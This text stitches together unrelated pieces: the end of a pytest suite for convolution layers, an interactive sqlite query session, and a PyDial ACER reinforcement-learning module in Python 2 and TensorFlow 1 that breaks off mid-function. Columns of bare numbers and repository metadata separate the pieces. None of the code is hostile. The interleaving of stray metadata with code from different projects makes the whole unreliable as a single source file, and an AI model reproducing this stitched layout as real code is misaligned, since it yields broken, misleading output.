            _ = conv.forward_pass(batch, training=True)

    def test_backward_pass_only_size_same_padding(self):
        # given
        batch = np.random.rand(64, 11, 11, 3)
        conv = FastConvLayer2D(w=np.random.rand(5, 5, 3, 16),
                               b=np.random.rand(16), padding='same')
        # when
        grads = conv.backward_pass(conv.forward_pass(batch, training=True))
        # then - the input gradient mirrors the input's shape
        assert grads.shape == batch.shape

    def test_backward_pass_only_size_valid_padding(self):
        # given
        batch = np.random.rand(64, 11, 11, 3)
        conv = FastConvLayer2D(w=np.random.rand(5, 5, 3, 16),
                               b=np.random.rand(16), padding='valid')
        # when
        grads = conv.backward_pass(conv.forward_pass(batch, training=True))
        # then
        assert grads.shape == batch.shape
class TestSuperFastConvLayer2D:
    """Same forward/backward contract checks, run against the fastest layer."""

    def test_forward_pass_with_same_padding(self):
        # given
        kernels = np.random.rand(5, 5, 3, 16)
        biases = np.random.rand(16)
        batch = np.random.rand(16, 11, 11, 3)
        # when
        conv = SuperFastConvLayer2D(w=kernels, b=biases, padding='same')
        out = conv.forward_pass(batch, training=True)
        # then - spatial dims preserved; one activation checked by hand
        assert out.shape == (16, 11, 11, 16)
        expected = np.sum(kernels[:, :, :, 0] * batch[0, 0:5, 0:5, :]) + biases[0]
        assert abs(expected - out[0, 2, 2, 0]) < 1e-8

    def test_forward_pass_with_valid_padding(self):
        # given
        kernels = np.random.rand(5, 5, 3, 16)
        biases = np.random.rand(16)
        batch = np.random.rand(16, 11, 11, 3)
        # when
        conv = SuperFastConvLayer2D(w=kernels, b=biases, padding='valid')
        out = conv.forward_pass(batch, training=True)
        # then - no padding, so the hand-computed value sits at the corner
        assert out.shape == (16, 7, 7, 16)
        expected = np.sum(kernels[:, :, :, 0] * batch[0, 0:5, 0:5, :]) + biases[0]
        assert abs(expected - out[0, 0, 0, 0]) < 1e-8

    def test_forward_pass_with_invalid_padding_value(self):
        # given
        kernels = np.random.rand(5, 5, 3, 16)
        biases = np.random.rand(16)
        batch = np.random.rand(16, 11, 11, 3)
        # when
        conv = SuperFastConvLayer2D(w=kernels, b=biases, padding='lorem ipsum')
        # then
        with pytest.raises(InvalidPaddingModeError):
            _ = conv.forward_pass(batch, training=True)

    def test_backward_pass_only_size_same_padding(self):
        # given
        batch = np.random.rand(64, 11, 11, 3)
        conv = SuperFastConvLayer2D(w=np.random.rand(5, 5, 3, 16),
                                    b=np.random.rand(16), padding='same')
        # when
        grads = conv.backward_pass(conv.forward_pass(batch, training=True))
        # then - the input gradient mirrors the input's shape
        assert grads.shape == batch.shape

    def test_backward_pass_only_size_valid_padding(self):
        # given
        batch = np.random.rand(64, 11, 11, 3)
        conv = SuperFastConvLayer2D(w=np.random.rand(5, 5, 3, 16),
                                    b=np.random.rand(16), padding='valid')
        # when
        grads = conv.backward_pass(conv.forward_pass(batch, training=True))
        # then
        assert grads.shape == batch.shape
| 31.735695
| 80
| 0.588134
| 1,560
| 11,647
| 4.24359
| 0.05
| 0.07855
| 0.117825
| 0.069789
| 0.959819
| 0.959819
| 0.953625
| 0.953474
| 0.935196
| 0.923565
| 0
| 0.064337
| 0.28737
| 11,647
| 366
| 81
| 31.822404
| 0.733253
| 0.030909
| 0
| 0.83105
| 0
| 0
| 0.012479
| 0
| 0
| 0
| 0
| 0
| 0.13242
| 1
| 0.118721
| false
| 0.164384
| 0.018265
| 0
| 0.150685
| 0.018265
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
969e2057c9dedfac5120a104480fb8f6091154ea
| 695
|
py
|
Python
|
chapter17/examples/removing_duplicates.py
|
YordanIH/Intro_to_CS_w_Python
|
eebbb8efd7ef0d07be9bc45b6b1e8f20737ce01a
|
[
"MIT"
] | null | null | null |
chapter17/examples/removing_duplicates.py
|
YordanIH/Intro_to_CS_w_Python
|
eebbb8efd7ef0d07be9bc45b6b1e8f20737ce01a
|
[
"MIT"
] | null | null | null |
chapter17/examples/removing_duplicates.py
|
YordanIH/Intro_to_CS_w_Python
|
eebbb8efd7ef0d07be9bc45b6b1e8f20737ce01a
|
[
"MIT"
] | null | null | null |
>>> cur.execute('''SELECT PopByRegion.Region
... FROM PopByRegion INNER JOIN PopByCountry
... WHERE (PopByRegion.Region = PopByCountry.Region)
... AND ((PopByCountry.Population * 1.0) / PopByRegion.Population > 0.10)''')
<sqlite3.Cursor object at 0x7fe3e818f7a0>
>>> cur.fetchall()
[('Eastern Asia',), ('North America',), ('North America',)]
>>> cur.execute('''SELECT DISTINCT PopByRegion.Region
... FROM PopByRegion INNER JOIN PopByCountry
... WHERE (PopByRegion.Region = PopByCountry.Region)
... AND ((PopByCountry.Population * 1.0) / PopByRegion.Population > 0.10)''')
<sqlite3.Cursor object at 0x7fe3e818f7a0>
>>> cur.fetchall()
[('Eastern Asia',), ('North America',)]
| 53.461538
| 195
| 0.68777
| 73
| 695
| 6.547945
| 0.356164
| 0.142259
| 0.066946
| 0.133891
| 0.891213
| 0.891213
| 0.891213
| 0.891213
| 0.891213
| 0.891213
| 0
| 0.046358
| 0.130935
| 695
| 13
| 196
| 53.461538
| 0.745033
| 0
| 0
| 0.333333
| 0
| 0.083333
| 0.701149
| 0.135057
| 0
| 0
| 0.04023
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
96a55ff7e612ff7eb4b9d5bec6dbb3ac0c212a55
| 24,356
|
py
|
Python
|
policy/DRL/acer.py
|
Dagu9/Reinforcement-learning-SGD
|
eb4a2546d6c99917b33e8cc4c210709e7d4cc15e
|
[
"Apache-2.0"
] | 2
|
2020-01-20T14:43:27.000Z
|
2021-04-29T12:21:05.000Z
|
policy/DRL/acer.py
|
gdialektakis/Statistical-Dialogue-Systems-with-Adversarial-AutoEncoders
|
cbfcc6e8afb0cde65b11f5206e00584031f4eaa6
|
[
"Apache-2.0"
] | null | null | null |
policy/DRL/acer.py
|
gdialektakis/Statistical-Dialogue-Systems-with-Adversarial-AutoEncoders
|
cbfcc6e8afb0cde65b11f5206e00584031f4eaa6
|
[
"Apache-2.0"
] | null | null | null |
###############################################################################
# PyDial: Multi-domain Statistical Spoken Dialogue System Software
###############################################################################
#
# Copyright 2015 - 2019
# Cambridge University Engineering Department Dialogue Systems Group
#
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
###############################################################################
"""
Implementation of ACER
The algorithm is developed with Tensorflow
Author: Gellert Weisz
"""
import tensorflow as tf
import numpy as np
import numpy as np
import tensorflow as tf
from random import choice
from time import sleep
from time import time
import sys # todo remove later
# ===========================
# Actor Critic with Experience Replay
# ===========================
class ACERNetwork(object):
    """Feed-forward actor-critic network for ACER, built as a TF1 static graph.

    Two parameter sets are created: ``theta`` (the live network) and
    ``avg_theta`` (an exponential moving average used as the trust-region
    reference for the TRPO-style gradient correction).  Policy and Q heads
    share one or, when h2_size > 0, two hidden layers.

    NOTE(review): this is Python 2 / TensorFlow 1.x code (print statements,
    tf.placeholder); it will not run under Python 3 as-is.
    """

    def __init__(self, sess, state_dim, action_dim, learning_rate, delta, c, alpha, h1_size = 130, h2_size = 50, is_training = True, actfreq_loss=None):
        # sess: externally owned tf.Session used for every run below.
        # delta: TRPO trust-region radius; c: importance-weight truncation
        # threshold; alpha: moving-average rate for avg_theta.
        self.sess = sess
        self.s_dim = state_dim
        self.a_dim = action_dim
        self.learning_rate = learning_rate
        self.delta = delta
        self.c = c
        self.alpha = alpha
        self.h1_size = h1_size
        self.h2_size = h2_size
        self.is_training = is_training

        #Input and hidden layers
        self.inputs = tf.placeholder(tf.float32, [None, self.s_dim])
        self.actions = tf.placeholder(tf.float32, [None, self.a_dim])
        # execMask is added to the policy logits before softmax, so it is
        # presumably 0 for executable actions and a large negative value for
        # masked ones — confirm against the caller.
        self.execMask = tf.placeholder(tf.float32, [None, self.a_dim])
        #if actfreq_loss is not False:

        def construct_theta():
            # Builds one fresh parameter list; called twice so that theta and
            # avg_theta get independent tf.Variables.
            W_fc1 = tf.Variable(tf.truncated_normal([self.s_dim, self.h1_size], stddev=0.01))
            b_fc1 = tf.Variable(0.0 * tf.ones([self.h1_size]))
            if self.h2_size > 0: # todo layer 2 should be shared between policy and q-function?
                W_h2 = tf.Variable(tf.truncated_normal([self.h1_size, self.h2_size], stddev=0.01))
                b_h2 = tf.Variable(0.0 * tf.ones([self.h2_size]))
                W_q = tf.Variable(tf.truncated_normal([self.h2_size, self.a_dim], stddev=0.01))
                b_q = tf.Variable(0.0 * tf.ones([self.a_dim]))
                W_policy = tf.Variable(tf.truncated_normal([self.h2_size, self.a_dim], stddev=0.01))
                b_policy = tf.Variable(0.0 * tf.ones([self.a_dim]))
                theta = [W_fc1, b_fc1, W_h2, b_h2, W_q, b_q, W_policy, b_policy]
            else:
                W_q = tf.Variable(tf.truncated_normal([self.h1_size, self.a_dim], stddev=0.01))
                b_q = tf.Variable(0.0 * tf.ones([self.a_dim]))
                W_policy = tf.Variable(tf.truncated_normal([self.h1_size, self.a_dim], stddev=0.01))
                b_policy = tf.Variable(0.0 * tf.ones([self.a_dim]))
                theta = [W_fc1, b_fc1, W_q, b_q, W_policy, b_policy]
            return theta

        self.theta = construct_theta()
        self.avg_theta = construct_theta()

        def construct_network(theta):
            # Wires the forward graph (policy + Q head) for a parameter list.
            if self.h2_size > 0:
                W_fc1, b_fc1, W_h2, b_h2, W_q, b_q, W_policy, b_policy = theta
            else:
                W_fc1, b_fc1, W_q, b_q, W_policy, b_policy = theta
            h_fc1 = tf.nn.relu(tf.matmul(self.inputs, W_fc1) + b_fc1)
            if self.h2_size > 0:
                h_h2 = tf.nn.relu(tf.matmul(h_fc1, W_h2) + b_h2)
                # Q function
                q = tf.matmul(h_h2, W_q) + b_q
                # prevent problem when calling log(self.policy)
                policy = tf.nn.softmax(tf.matmul(h_h2, W_policy) + b_policy + self.execMask) + 0.00001
            else: # 1 hidden layer
                # value function
                q = tf.matmul(h_fc1, W_q) + b_q
                # policy function
                policy = tf.nn.softmax(tf.matmul(h_fc1, W_policy) + b_policy + self.execMask) + 0.00001
            return policy, q

        self.policy, self.q = construct_network(self.theta)
        self.avg_policy, _ = construct_network(self.avg_theta)
        # The average network is a fixed reference — never trained directly.
        self.avg_policy = tf.stop_gradient(self.avg_policy)

        # weighted average over q-values according to current policy gives the value of the state
        self.value = tf.reduce_sum(self.q * self.policy, 1)
        self.actions_onehot = self.actions
        self.responsible_outputs = tf.reduce_sum(self.policy * self.actions_onehot, [1])
        self.responsible_q = tf.reduce_sum(self.q * self.actions_onehot, [1])

        # IS weights; mu holds the behaviour policy's action probabilities.
        self.mu = tf.placeholder(tf.float32, [None, self.a_dim])
        self.responsible_mu = tf.reduce_sum(self.mu * self.actions_onehot, [1])
        self.rho = self.responsible_outputs / self.responsible_mu
        self.rho_all = self.policy / self.mu
        self.rho_bar = tf.minimum(1., self.rho)
        self.rho_bar_c = tf.minimum(self.c, self.rho)

        # Retrace Q targets, computed in train() and fed in.
        self.q_ret = tf.placeholder(tf.float32, [None])

        # step 1 from pawel
        self.advantages_qret = self.q_ret - self.value
        self.wrt_theta_step1 = -tf.reduce_sum(tf.log(self.responsible_outputs) * tf.stop_gradient(self.rho * self.advantages_qret))

        # step 2 from pawel: truncated importance weights plus bias correction
        self.wrt_theta = tf.reduce_sum(
            tf.log(self.responsible_outputs) * tf.stop_gradient(self.rho_bar_c * self.advantages_qret) +
            tf.reduce_sum(tf.log(self.policy) *
                          tf.stop_gradient(tf.maximum(0., 1. - self.c / self.rho_all) *
                                           self.policy * (self.q - tf.reshape(self.value, [-1, 1]))), [1]))
        self.wrt_theta_v = tf.reduce_sum(tf.square(self.q_ret - self.responsible_q))
        self.entropy = -tf.reduce_sum(self.policy * tf.log(self.policy))
        #self.loss = self.wrt_theta_v + self.wrt_theta - self.entropy * 0.01

        self.target_v = tf.placeholder(tf.float32, [None])
        self.advantages = tf.placeholder(tf.float32, [None])
        # Diagnostic only: how far the fed advantages are from the Retrace ones.
        self.advantage_qret_diff = tf.reduce_mean(tf.square(self.advantages - self. advantages_qret))

        # DEBUG (A2C)
        #self.value_loss = 0.5 * tf.reduce_sum(tf.square(self.target_v - tf.reshape(self.value, [-1]))) # original a2c
        self.q_loss = 0.5 * self.wrt_theta_v
        self.policy_loss = -self.wrt_theta
        self.entropy = - tf.reduce_sum(self.policy * tf.log(self.policy))
        self.loss = self.q_loss + self.policy_loss - 0.01 * self.entropy

        self.optimizer = tf.train.AdamOptimizer(self.learning_rate)
        # NOTE: this op is replaced by the TRPO op list a few lines below.
        self.optimize = self.optimizer.minimize(self.loss)

        # TRPO in theta-space
        use_trpo = True # can switch off TRPO here
        self.value_gradients = self.optimizer.compute_gradients(self.q_loss)
        self.entropy_gradients = self.optimizer.compute_gradients(-0.01 * self.entropy)
        self.g = self.optimizer.compute_gradients(-self.policy_loss)
        self.kl = tf.reduce_sum(tf.reduce_sum(self.avg_policy * tf.log(self.avg_policy / self.policy), [1])) # this is total KL divergence, per batch
        self.k = self.optimizer.compute_gradients(self.kl)
        self.g = [(grad, var) for grad, var in self.g if grad is not None]
        self.k = [(grad, var) for grad, var in self.k if grad is not None]
        assert len(self.g) == len(self.k)
        # Project the policy gradient g against the KL gradient k and scale
        # back whenever the linearised KL step would exceed delta.
        self.klprod = tf.reduce_sum([tf.reduce_sum(tf.reshape(k[0], [-1]) * tf.reshape(g[0], [-1])) for k, g in zip(self.k, self.g)])
        self.klen = tf.reduce_sum([tf.reduce_sum(tf.reshape(k[0], [-1]) * tf.reshape(k[0], [-1])) for k, g in zip(self.k, self.g)])
        self.trpo_scale = tf.maximum(0., (self.klprod - self.delta) / self.klen)
        self.final_gradients = []
        for i in range(len(self.g)):
            if use_trpo:
                self.final_gradients.append((-(self.g[i][0] - self.trpo_scale * self.k[i][0]), self.g[i][1])) # negative because this is loss
            else:
                self.final_gradients.append((-self.g[i][0], self.g[i][1])) # negative because this is loss

        self.optimize = [self.optimizer.apply_gradients(self.final_gradients),
                         self.optimizer.apply_gradients(self.entropy_gradients),
                         self.optimizer.apply_gradients(self.value_gradients)]
        # Exponential moving average update for the reference network.
        self.update_avg_theta = [avg_w.assign(self.alpha * avg_w + (1. - self.alpha) * w)
                                 for avg_w, w in zip(self.avg_theta, self.theta)]

    def getPolicy(self, inputs, execMask):
        """Return the action probabilities for a batch of states (wrapped in a one-element list)."""
        return self.sess.run([self.policy], feed_dict={
            self.inputs: inputs,
            self.execMask: execMask,
        })

    def train(self, inputs, actions, execMask, rewards, unflattened_inputs, unflattened_rewards, gamma, mu, discounted_rewards, advantages):
        """Run one ACER update on a batch of flattened episodes.

        First computes per-episode Retrace Q targets by walking each episode
        backwards, then runs the TRPO-corrected policy/entropy/value gradient
        ops and refreshes the average network.

        Returns (loss, entropy, optimize) — the fetched loss scalar, entropy
        scalar, and the results of the optimize op list.
        """
        value, responsible_q, rho_bar, responsible_outputs = self.sess.run(
            [self.value, self.responsible_q, self.rho_bar, self.responsible_outputs], feed_dict={
                self.inputs: inputs,
                self.actions: actions,
                self.execMask: execMask,
                self.mu: mu,
            })
        q_rets, offset = [], 0
        #print >> sys.stderr, rho_bar[0], value[0], responsible_q[0]
        for j in range(0, len(unflattened_inputs)): # todo implement retrace for lambda other than one
            q_ret, new_q_ret = [], 0
            # Walk the episode backwards, accumulating the Retrace target.
            for i in range(len(unflattened_inputs[j])-1, -1, -1):
                new_q_ret = rewards[offset+i] + gamma * new_q_ret
                q_ret.append(new_q_ret)
                new_q_ret = rho_bar[offset+i] * (new_q_ret - responsible_q[offset+i]) + value[offset+i]
                #new_q_ret = value[offset+i] # debug
            q_ret = list(reversed(q_ret))
            q_rets.append(q_ret)
            offset += len(unflattened_inputs[j])
        q_ret_flat = np.concatenate(np.array(q_rets), axis=0).tolist()
        feed_dict = {
            self.inputs: inputs,
            self.actions: actions,
            self.execMask: execMask,
            self.mu: mu,
            self.q_ret: q_ret_flat,
            self.target_v: discounted_rewards,
            self.advantages: advantages,
        }
        trpo_scale, klprod, kl, diff, entropy, loss, optimize = self.sess.run([self.trpo_scale, self.klprod, self.kl, self.advantage_qret_diff, self.entropy, self.loss, self.optimize], feed_dict=feed_dict)
        update_avg_theta = self.sess.run([self.update_avg_theta], feed_dict=feed_dict)
        return loss, entropy, optimize

    def predict_policy(self, inputs, execMask):
        """Return action probabilities for a batch of states."""
        return self.sess.run(self.policy, feed_dict={
            self.inputs: inputs,
            self.execMask: execMask,
        })

    def predict_value(self, inputs, execMask):
        """Return state values V(s) = sum_a pi(a|s) * Q(s, a)."""
        return self.sess.run(self.value, feed_dict={
            self.inputs: inputs,
            self.execMask: execMask,
        })

    def predict_action_value(self, inputs, execMask):
        """Return (policy, value) for a batch of states in a single session run."""
        return self.sess.run([self.policy, self.value], feed_dict={
            self.inputs: inputs,
            self.execMask: execMask,
        })

    def load_network(self, load_filename):
        """Restore weights from a checkpoint, skipping the first iteration.

        NOTE(review): the filename's third-from-last dot-separated field is
        used as the iteration number, and the bare except silently swallows
        every restore failure.
        """
        self.saver = tf.train.Saver()
        if load_filename.split('.')[-3] != '0':
            try:
                self.saver.restore(self.sess, load_filename)
                print "Successfully loaded:", load_filename
            except:
                print "Could not find old network weights"
        else:
            print 'nothing loaded in first iteration'

    def save_network(self, save_filename):
        """Save weights to a checkpoint.

        NOTE(review): relies on load_network() having been called first to
        create self.saver — confirm the caller guarantees that ordering.
        """
        print 'Saving acer-network...'
        self.saver.save(self.sess, save_filename)
class RNNACERNetwork(object):
    """ACER network variant with an optional GRU encoder over the
    slot-dependent part of the belief state.

    When ``slot == 'sd'`` the first ``sd_state_dim`` input features are run
    through a GRU and its final state is concatenated with the slot-independent
    features before the shared hidden layers; otherwise the raw input is used.
    Everything after the encoder mirrors ACERNetwork.

    NOTE(review): this is Python 2 / TensorFlow 1.x code (print statements,
    tf.placeholder); it will not run under Python 3 as-is.
    """

    def __init__(self, sess, si_state_dim, sd_state_dim, action_dim, learning_rate, delta, c, alpha, h1_size = 130, h2_size = 50, is_training = True, sd_enc_size=25,
                 si_enc_size=25, dropout_rate=0., tn='normal', slot='si'):
        # sess: externally owned tf.Session; delta/c/alpha as in ACERNetwork.
        # tn: variable-scope name for the GRU encoder; slot selects whether
        # the slot-dependent features are encoded ('sd') or passed through.
        self.sess = sess
        self.s_dim = si_state_dim + sd_state_dim
        self.a_dim = action_dim
        self.learning_rate = learning_rate
        self.delta = delta
        self.c = c
        self.alpha = alpha
        self.h1_size = h1_size
        self.h2_size = h2_size
        self.is_training = is_training
        self.sd_dim = sd_state_dim
        self.si_dim = si_state_dim
        self.sd_enc_size = sd_enc_size

        #Input and hidden layers
        self.inputs = tf.placeholder(tf.float32, [None, self.s_dim])
        self.actions = tf.placeholder(tf.float32, [None, self.a_dim])
        self.execMask = tf.placeholder(tf.float32, [None, self.a_dim])

        keep_prob = 1 - dropout_rate
        # Split the flat input into slot-dependent and slot-independent parts.
        sd_inputs, si_inputs = tf.split(self.inputs, [self.sd_dim, self.si_dim], 1)
        if slot == 'sd':
            # Treat the sd features as a length-1 sequence for the GRU.
            sd_inputs = tf.reshape(sd_inputs, (tf.shape(sd_inputs)[0], 1, self.sd_dim))
            # slots encoder
            with tf.variable_scope(tn):
                # try:
                lstm_cell = tf.nn.rnn_cell.GRUCell(self.sd_enc_size)
                if keep_prob < 1:
                    lstm_cell = tf.nn.rnn_cell.DropoutWrapper(lstm_cell, output_keep_prob=keep_prob)
                hidden_state = lstm_cell.zero_state(tf.shape(sd_inputs)[0], tf.float32)
                _, h_sdfe = tf.nn.dynamic_rnn(lstm_cell, sd_inputs, initial_state=hidden_state)
                # except:
                #     lstm_cell = tf.contrib.rnn.GRUCell(self.sd_enc_size)
                #     hidden_state = lstm_cell.zero_state(tf.shape(sd_inputs)[0], tf.float32)
                #     _, h_sdfe = tf.contrib.rnn.dynamic_rnn(lstm_cell, sd_inputs, initial_state=hidden_state)
            h1_inputs = tf.concat((si_inputs, h_sdfe), 1)
        else:
            '''W_sdfe = tf.Variable(tf.truncated_normal([self.sd_dim, sd_enc_size], stddev=0.01))
            b_sdfe = tf.Variable(tf.zeros([sd_enc_size]))
            h_sdfe = tf.nn.relu(tf.matmul(sd_inputs, W_sdfe) + b_sdfe)
            if keep_prob < 1:
                h_sdfe = tf.nn.dropout(h_sdfe, keep_prob)'''
            h1_inputs = self.inputs

        def construct_theta():
            # Builds one fresh parameter list; called twice so that theta and
            # avg_theta get independent tf.Variables.
            # NOTE(review): W_fc1 is sized with self.s_dim, but when
            # slot == 'sd' h1_inputs has si_dim + sd_enc_size columns —
            # possible shape mismatch unless those happen to agree; confirm.
            W_fc1 = tf.Variable(tf.truncated_normal([self.s_dim, self.h1_size], stddev=0.01))
            b_fc1 = tf.Variable(0.0 * tf.ones([self.h1_size]))
            if self.h2_size > 0: # todo layer 2 should be shared between policy and q-function?
                W_h2 = tf.Variable(tf.truncated_normal([self.h1_size, self.h2_size], stddev=0.01))
                b_h2 = tf.Variable(0.0 * tf.ones([self.h2_size]))
                W_q = tf.Variable(tf.truncated_normal([self.h2_size, self.a_dim], stddev=0.01))
                b_q = tf.Variable(0.0 * tf.ones([self.a_dim]))
                W_policy = tf.Variable(tf.truncated_normal([self.h2_size, self.a_dim], stddev=0.01))
                b_policy = tf.Variable(0.0 * tf.ones([self.a_dim]))
                theta = [W_fc1, b_fc1, W_h2, b_h2, W_q, b_q, W_policy, b_policy]
            else:
                W_q = tf.Variable(tf.truncated_normal([self.h1_size, self.a_dim], stddev=0.01))
                b_q = tf.Variable(0.0 * tf.ones([self.a_dim]))
                W_policy = tf.Variable(tf.truncated_normal([self.h1_size, self.a_dim], stddev=0.01))
                b_policy = tf.Variable(0.0 * tf.ones([self.a_dim]))
                theta = [W_fc1, b_fc1, W_q, b_q, W_policy, b_policy]
            return theta

        self.theta = construct_theta()
        self.avg_theta = construct_theta()

        def construct_network(theta):
            # Wires the forward graph for a parameter list; consumes the
            # (possibly encoded) h1_inputs rather than the raw placeholder.
            if self.h2_size > 0:
                W_fc1, b_fc1, W_h2, b_h2, W_q, b_q, W_policy, b_policy = theta
            else:
                W_fc1, b_fc1, W_q, b_q, W_policy, b_policy = theta
            h_fc1 = tf.nn.relu(tf.matmul(h1_inputs, W_fc1) + b_fc1)
            if self.h2_size > 0:
                h_h2 = tf.nn.relu(tf.matmul(h_fc1, W_h2) + b_h2)
                # Q function
                q = tf.matmul(h_h2, W_q) + b_q
                # prevent problem when calling log(self.policy)
                policy = tf.nn.softmax(tf.matmul(h_h2, W_policy) + b_policy + self.execMask) + 0.00001
            else: # 1 hidden layer
                # value function
                q = tf.matmul(h_fc1, W_q) + b_q
                # policy function
                policy = tf.nn.softmax(tf.matmul(h_fc1, W_policy) + b_policy + self.execMask) + 0.00001
            return policy, q

        self.policy, self.q = construct_network(self.theta)
        self.avg_policy, _ = construct_network(self.avg_theta)
        # The average network is a fixed reference — never trained directly.
        self.avg_policy = tf.stop_gradient(self.avg_policy)

        # weighted average over q-values according to current policy gives the value of the state
        self.value = tf.reduce_sum(self.q * self.policy, 1)
        self.actions_onehot = self.actions
        self.responsible_outputs = tf.reduce_sum(self.policy * self.actions_onehot, [1])
        self.responsible_q = tf.reduce_sum(self.q * self.actions_onehot, [1])

        # IS weights; mu holds the behaviour policy's action probabilities.
        self.mu = tf.placeholder(tf.float32, [None, self.a_dim])
        self.responsible_mu = tf.reduce_sum(self.mu * self.actions_onehot, [1])
        self.rho = self.responsible_outputs / self.responsible_mu
        self.rho_all = self.policy / self.mu
        self.rho_bar = tf.minimum(1., self.rho)
        self.rho_bar_c = tf.minimum(self.c, self.rho)

        # Retrace Q targets, computed in train() and fed in.
        self.q_ret = tf.placeholder(tf.float32, [None])

        # step 1 from pawel
        self.advantages_qret = self.q_ret - self.value
        self.wrt_theta_step1 = -tf.reduce_sum(tf.log(self.responsible_outputs) * tf.stop_gradient(self.rho * self.advantages_qret))

        # step 2 from pawel: truncated importance weights plus bias correction
        self.wrt_theta = tf.reduce_sum(
            tf.log(self.responsible_outputs) * tf.stop_gradient(self.rho_bar_c * self.advantages_qret) +
            tf.reduce_sum(tf.log(self.policy) *
                          tf.stop_gradient(tf.maximum(0., 1. - self.c / self.rho_all) *
                                           self.policy * (self.q - tf.reshape(self.value, [-1, 1]))), [1]))
        self.wrt_theta_v = tf.reduce_sum(tf.square(self.q_ret - self.responsible_q))
        self.entropy = -tf.reduce_sum(self.policy * tf.log(self.policy))
        #self.loss = self.wrt_theta_v + self.wrt_theta - self.entropy * 0.01

        self.target_v = tf.placeholder(tf.float32, [None])
        self.advantages = tf.placeholder(tf.float32, [None])
        # Diagnostic only: how far the fed advantages are from the Retrace ones.
        self.advantage_qret_diff = tf.reduce_mean(tf.square(self.advantages - self. advantages_qret))

        # DEBUG (A2C)
        #self.value_loss = 0.5 * tf.reduce_sum(tf.square(self.target_v - tf.reshape(self.value, [-1]))) # original a2c
        self.q_loss = 0.5 * self.wrt_theta_v
        self.policy_loss = -self.wrt_theta
        self.entropy = - tf.reduce_sum(self.policy * tf.log(self.policy))
        self.loss = self.q_loss + self.policy_loss - 0.01 * self.entropy

        self.optimizer = tf.train.AdamOptimizer(self.learning_rate)
        # NOTE: this op is replaced by the TRPO op list a few lines below.
        self.optimize = self.optimizer.minimize(self.loss)

        # TRPO in theta-space
        use_trpo = True # can switch off TRPO here
        self.value_gradients = self.optimizer.compute_gradients(self.q_loss)
        self.entropy_gradients = self.optimizer.compute_gradients(-0.01 * self.entropy)
        self.g = self.optimizer.compute_gradients(-self.policy_loss)
        self.kl = tf.reduce_sum(tf.reduce_sum(self.avg_policy * tf.log(self.avg_policy / self.policy), [1])) # this is total KL divergence, per batch
        self.k = self.optimizer.compute_gradients(self.kl)
        self.g = [(grad, var) for grad, var in self.g if grad is not None]
        self.k = [(grad, var) for grad, var in self.k if grad is not None]
        assert len(self.g) == len(self.k)
        # Project the policy gradient g against the KL gradient k and scale
        # back whenever the linearised KL step would exceed delta.
        self.klprod = tf.reduce_sum([tf.reduce_sum(tf.reshape(k[0], [-1]) * tf.reshape(g[0], [-1])) for k, g in zip(self.k, self.g)])
        self.klen = tf.reduce_sum([tf.reduce_sum(tf.reshape(k[0], [-1]) * tf.reshape(k[0], [-1])) for k, g in zip(self.k, self.g)])
        self.trpo_scale = tf.maximum(0., (self.klprod - self.delta) / self.klen)
        self.final_gradients = []
        for i in range(len(self.g)):
            if use_trpo:
                self.final_gradients.append((-(self.g[i][0] - self.trpo_scale * self.k[i][0]), self.g[i][1])) # negative because this is loss
            else:
                self.final_gradients.append((-self.g[i][0], self.g[i][1])) # negative because this is loss

        self.optimize = [self.optimizer.apply_gradients(self.final_gradients),
                         self.optimizer.apply_gradients(self.entropy_gradients),
                         self.optimizer.apply_gradients(self.value_gradients)]
        # Exponential moving average update for the reference network.
        self.update_avg_theta = [avg_w.assign(self.alpha * avg_w + (1. - self.alpha) * w)
                                 for avg_w, w in zip(self.avg_theta, self.theta)]

    def getPolicy(self, inputs, execMask):
        """Return the action probabilities for a batch of states (wrapped in a one-element list)."""
        return self.sess.run([self.policy], feed_dict={
            self.inputs: inputs,
            self.execMask: execMask,
        })

    def train(self, inputs, actions, execMask, rewards, unflattened_inputs, unflattened_rewards, gamma, mu, discounted_rewards, advantages):
        """Run one ACER update on a batch of flattened episodes.

        First computes per-episode Retrace Q targets by walking each episode
        backwards, then runs the TRPO-corrected policy/entropy/value gradient
        ops and refreshes the average network.

        Returns (loss, entropy, optimize) — the fetched loss scalar, entropy
        scalar, and the results of the optimize op list.
        """
        value, responsible_q, rho_bar, responsible_outputs = self.sess.run(
            [self.value, self.responsible_q, self.rho_bar, self.responsible_outputs], feed_dict={
                self.inputs: inputs,
                self.actions: actions,
                self.execMask: execMask,
                self.mu: mu,
            })
        q_rets, offset = [], 0
        #print >> sys.stderr, rho_bar[0], value[0], responsible_q[0]
        for j in range(0, len(unflattened_inputs)): # todo implement retrace for lambda other than one
            q_ret, new_q_ret = [], 0
            # Walk the episode backwards, accumulating the Retrace target.
            for i in range(len(unflattened_inputs[j])-1, -1, -1):
                new_q_ret = rewards[offset+i] + gamma * new_q_ret
                q_ret.append(new_q_ret)
                new_q_ret = rho_bar[offset+i] * (new_q_ret - responsible_q[offset+i]) + value[offset+i]
                #new_q_ret = value[offset+i] # debug
            q_ret = list(reversed(q_ret))
            q_rets.append(q_ret)
            offset += len(unflattened_inputs[j])
        q_ret_flat = np.concatenate(np.array(q_rets), axis=0).tolist()
        feed_dict = {
            self.inputs: inputs,
            self.actions: actions,
            self.execMask: execMask,
            self.mu: mu,
            self.q_ret: q_ret_flat,
            self.target_v: discounted_rewards,
            self.advantages: advantages,
        }
